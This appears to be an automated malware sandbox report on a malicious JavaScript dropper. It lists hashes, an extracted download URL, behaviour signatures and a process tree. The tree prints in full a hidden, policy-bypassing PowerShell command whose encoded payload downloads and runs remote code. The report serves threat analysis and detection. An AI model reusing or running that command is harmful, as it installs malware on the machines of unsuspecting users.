Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12/02/2024, 11:40
Static task
static1
Behavioral task
behavioral1
Sample
97119b6a31b4b2a63245ba8a7cc6ea70.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
97119b6a31b4b2a63245ba8a7cc6ea70.js
Resource
win10v2004-20231215-en
General
-
Target
97119b6a31b4b2a63245ba8a7cc6ea70.js
-
Size
90KB
-
MD5
97119b6a31b4b2a63245ba8a7cc6ea70
-
SHA1
38c10ac0c0b2499eef862933bdbb3454f36b2e9d
-
SHA256
4e84f80ca52540a020bd3061cd1cec4fb0309e95d49d7465d0f78f2156afc4c3
-
SHA512
87181ca760e12fff885d75640d6115c15b6fa8249304c4d060421e82d61608480bf75222a8e2b016bab7f79d9f9699cb0be6f679fa38a5170bf1e4d9bf12a950
-
SSDEEP
1536:dtE3R0bsGRBjaO76BNut9Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9v:d2hLGRHsy9Ry98guHVBqqg2bcruzUHm2
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2944 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2780 3028 wscript.exe 28 PID 3028 wrote to memory of 2780 3028 wscript.exe 28 PID 3028 wrote to memory of 2780 3028 wscript.exe 28 PID 2780 wrote to memory of 2944 2780 cmd.exe 30 PID 2780 wrote to memory of 2944 2780 cmd.exe 30 PID 2780 wrote to memory of 2944 2780 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\97119b6a31b4b2a63245ba8a7cc6ea70.js1⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-